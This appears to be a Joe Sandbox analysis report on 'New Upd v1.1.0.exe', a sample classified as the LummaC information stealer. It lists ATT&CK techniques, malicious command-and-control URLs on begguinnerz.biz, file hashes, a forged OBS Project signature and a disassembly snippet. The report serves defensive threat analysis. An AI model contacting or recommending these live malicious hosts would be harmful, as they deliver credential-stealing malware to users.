Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	11 Input Capture	231 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://begguinnerz.biz/pi	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/apioQ	100%	Avira URL Cloud	malware
https://begguinnerz.biz/U	100%	Avira URL Cloud	malware
https://begguinnerz.biz/ym	100%	Avira URL Cloud	malware
https://begguinnerz.biz/apiam	100%	Avira URL Cloud	malware
https://begguinnerz.biz/	100%	Avira URL Cloud	malware
https://begguinnerz.biz/An	100%	Avira URL Cloud	malware
https://begguinnerz.biz/1ner	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/apin.txtPK	100%	Avira URL Cloud	malware
begguinnerz.biz	100%	Avira URL Cloud	malware
https://begguinnerz.biz/api19	100%	Avira URL Cloud	malware
https://begguinnerz.biz/apis	100%	Avira URL Cloud	malware
https://begguinnerz.biz/pian	100%	Avira URL Cloud	malware
https://begguinnerz.biz/Qm	100%	Avira URL Cloud	malware
https://begguinnerz.biz/as	100%	Avira URL Cloud	malware
https://begguinnerz.biz/apill	100%	Avira URL Cloud	malware
https://begguinnerz.biz/api	100%	Avira URL Cloud	malware
https://begguinnerz.biz/piYn	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/api	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/apiLQ	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		high
begguinnerz.biz	104.21.92.91	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
begguinnerz.biz	true	Avira URL Cloud: malware	unknown
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
prisonyfork.buzz	false		high
https://begguinnerz.biz/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/ym	New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsoft	New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1957041720.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/apin.txtPK	New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/	New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/apiam	New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/1ner	New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/pi	New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/U	New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz:443/apioQ	New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/An	New Upd v1.1.0.exe, 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888266882.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	New Upd v1.1.0.exe, 00000000.00000003.1838952572.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838721426.00000000039E7000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/api19	New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	New Upd v1.1.0.exe, 00000000.00000003.1861824939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/apis	New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/as	New Upd v1.1.0.exe, 00000000.00000003.1838881668.000000000399F000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839511974.000000000399A000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838829498.000000000399C000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1838777067.0000000003996000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1839281599.000000000399A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/pian	New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.microsof	New Upd v1.1.0.exe, 00000000.00000003.1816237689.0000000003A35000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/Qm	New Upd v1.1.0.exe, 00000000.00000002.1958189458.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1956864556.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	New Upd v1.1.0.exe, 00000000.00000003.1860717733.00000000039C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/apiLQ	New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/apill	New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/piYn	New Upd v1.1.0.exe, 00000000.00000003.1935683900.0000000000E24000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909357359.0000000000E24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	New Upd v1.1.0.exe, 00000000.00000003.1816371099.00000000039C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	New Upd v1.1.0.exe, 00000000.00000003.1815791867.00000000039DB000.00000004.00000800.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815856362.00000000039D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/api	New Upd v1.1.0.exe, 00000000.00000003.1956886066.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000002.1958057888.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1888319727.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1909433351.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1935726270.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, New Upd v1.1.0.exe, 00000000.00000003.1815160136.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.92.91	begguinnerz.biz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581509
Start date and time:	2024-12-27 23:20:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	New Upd v1.1.0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 75% Number of executed functions: 4 Number of non-executed functions: 19
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.149.20.212, 13.107.246.63
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: New Upd v1.1.0.exe

Simulations

Behavior and APIs

Time	Type	Description
17:21:12	API Interceptor	8x Sleep call for process: New Upd v1.1.0.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.92.91	file.exe	Get hash	malicious	LummaC Stealer	Browse	suprafox.fun/api

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
begguinnerz.biz	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
bg.microsoft.map.fastly.net	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	wp.bat	Get hash	malicious	Unknown	Browse	199.232.210.172
	final.exe	Get hash	malicious	Meterpreter	Browse	199.232.214.172
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	A4FY1OA97K.lnk	Get hash	malicious	DanaBot	Browse	199.232.214.172
	vreFmptfUu.lnk	Get hash	malicious	DanaBot	Browse	199.232.210.172
	54861 Proforma Invoice AMC2273745.xlam.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	6ee7HCp9cD.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	C8QT9HkXEb.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	P9UXlizXVS.exe	Get hash	malicious	AsyncRAT	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.30.13
	Installer.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	phish_alert_iocp_v1.4.48 - 2024-12-27T140703.193.eml	Get hash	malicious	Unknown	Browse	104.18.11.207
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	104.21.73.97
	NewSetup.exe	Get hash	malicious	LummaC	Browse	172.67.157.249
	ForcesLangi.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	iviewers.dll	Get hash	malicious	LummaC	Browse	104.21.60.24
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	launcher.exe	Get hash	malicious	LummaC	Browse	104.21.58.80

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	WonderHack.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Installer.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Installer.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	SoftWare(1).exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	NewSetup.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	ForcesLangi.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	iviewers.dll	Get hash	malicious	LummaC	Browse	104.21.92.91
	launcher.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Leside-.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	search.hta	Get hash	malicious	Unknown	Browse	104.21.92.91

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.667131016451722
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	New Upd v1.1.0.exe
File size:	2'510'896 bytes
MD5:	3bdf3c4f1cfbb40a395ec5b10d97faf3
SHA1:	a8d14eccdc6693375a7e22d4cf8677c6a90f9ec4
SHA256:	a9748e3079e5e53cafe8a6251de92016f906d9e2c4e8d3835c641eb0de7c0edb
SHA512:	e8c636ec2b6dc9eb5aab1810ee48ced5cf0d977e64981108d02b3606b5b4d0c817e0d2b5f52789d7f804ca3c79b6465a06de696ad180926d1477ea3f5c21ad2c
SSDEEP:	49152:HI3ET1BPrOpCSIwGkVY6iLBGsKmluzhGTAxRu5:HT0HjigsKmIhGAx4
TLSH:	AFC5693CE1E1BC35E06610BF70B9E9190B5F1F911755A0CBE9C8F9A90EB2EC274A1D49
File Content Preview:	MZ......................@............................!..p...............!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..6...E%..r...Richs...........................PE..L.....^O..............SR.....P........@...<...C...@

File Icon


Icon Hash:	35a6c55d754b0141

Static PE Info

General

Entrypoint:	0x80ee8b
Entrypoint Section:	.text1
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x4F5EE4D0 [Tue Mar 13 06:10:24 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ba90881d3200a11da1ab805ba75978ee

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Global G3 Code Signing ECC SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	28/01/2024 00:00:00 27/01/2027 23:59:59
Subject Chain	CN="OBS Project, LLC", O="OBS Project, LLC", L=Sheridan, S=Wyoming, C=US, SERIALNUMBER=2023-001272252, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Wyoming, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	5735EB42B275BF53C686D62E3D795F79
Thumbprint SHA-1:	EC0614E3D9455AA731992287C6F7E44A5288C232
Thumbprint SHA-256:	90C823C5701D7E1F9BE1DCDD3A2BC59ABE8DD93B734331AE8A3E68612A8CF3D1
Serial:	0D416A0683B8C191DEE8DEEEC54DAB37

Entrypoint Preview

Instruction
call 00007F0A1090F3BAh
jmp 00007F0A1090718Bh
push 0000000Ch
push 00845EE0h
call 00007F0A1090AAF8h
and dword ptr [ebp-1Ch], 00000000h
mov esi, dword ptr [ebp+08h]
cmp esi, dword ptr [008497E8h]
jnbe 00007F0A10907394h
push 00000004h
call 00007F0A1090AE8Ah
pop ecx
and dword ptr [ebp-04h], 00000000h
push esi
call 00007F0A1090D1EDh
pop ecx
mov dword ptr [ebp-1Ch], eax
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F0A1090737Eh
mov eax, dword ptr [ebp-1Ch]
call 00007F0A1090AB04h
ret
push 00000004h
call 00007F0A1090AD87h
pop ecx
ret
push ebp
mov ebp, dword ptr [esp+08h]
cmp ebp, FFFFFFE0h
ja 00007F0A10907415h
push ebx
mov ebx, dword ptr [008391E8h]
push esi
push edi
xor esi, esi
cmp dword ptr [008483F4h], esi
mov edi, ebp
jne 00007F0A1090738Ah
call 00007F0A1090AC86h
push 0000001Eh
call 00007F0A1090AADFh
push 000000FFh
call 00007F0A10905B6Fh
pop ecx
pop ecx
mov eax, dword ptr [008497F8h]
cmp eax, 01h
jne 00007F0A10907380h
cmp ebp, esi
je 00007F0A10907376h
mov eax, ebp
jmp 00007F0A10907375h
xor eax, eax
inc eax
push eax
jmp 00007F0A10907390h
cmp eax, 03h
jne 00007F0A1090737Dh
push ebp
call 00007F0A109072C8h
cmp eax, esi
pop ecx
jne 00007F0A10907389h
cmp ebp, esi
jne 00007F0A10907375h
xor edi, edi
inc edi
add edi, 0Fh
and edi, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x449820	0x50	.data1
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5b9000	0xa7000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x263000	0x2030	.text
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x439000	0x2f4	.data1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3b7114	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x3b9000	0xf174	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text1	0x3c9000	0x60000	0x5b000	05b936d6faccd76afeac8a45191260d5	False	0.3614864139766483	data	6.516961073142224	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.adata	0x429000	0x10000	0xd000	938d6d97628275a512e07c66be5ccecf	False	0.0013897235576923077	data	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data1	0x439000	0x30000	0x12000	e1fafec24249c0e113957ac17997c421	False	0.3744439019097222	data	4.7613604097111795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x469000	0x150000	0x141000	5a01308111b52247d62a14416b33a673	False	1.0001650421047508	data	7.999596356493672	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5b9000	0xa7000	0xa7000	a3156311d6cd46f25829fa25a3e2e2df	False	0.5336417009730539	data	7.048999692502979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x5b942c	0x4018c	Device independent bitmap graphic, 500 x 175 x 24, image size 262500, resolution 2800 x 2800 px/m	English	United States	0.04686904852593891
RT_BITMAP	0x5f95b8	0x1618	Device independent bitmap graphic, 103 x 18 x 24, image size 5616, resolution 2835 x 2835 px/m, 16777216 important colors	English	United States	0.20403111739745403
RT_BITMAP	0x5fabd0	0xb78	Device independent bitmap graphic, 103 x 18 x 8, image size 0, resolution 2835 x 2835 px/m, 256 important colors	English	United States	0.4434604904632153
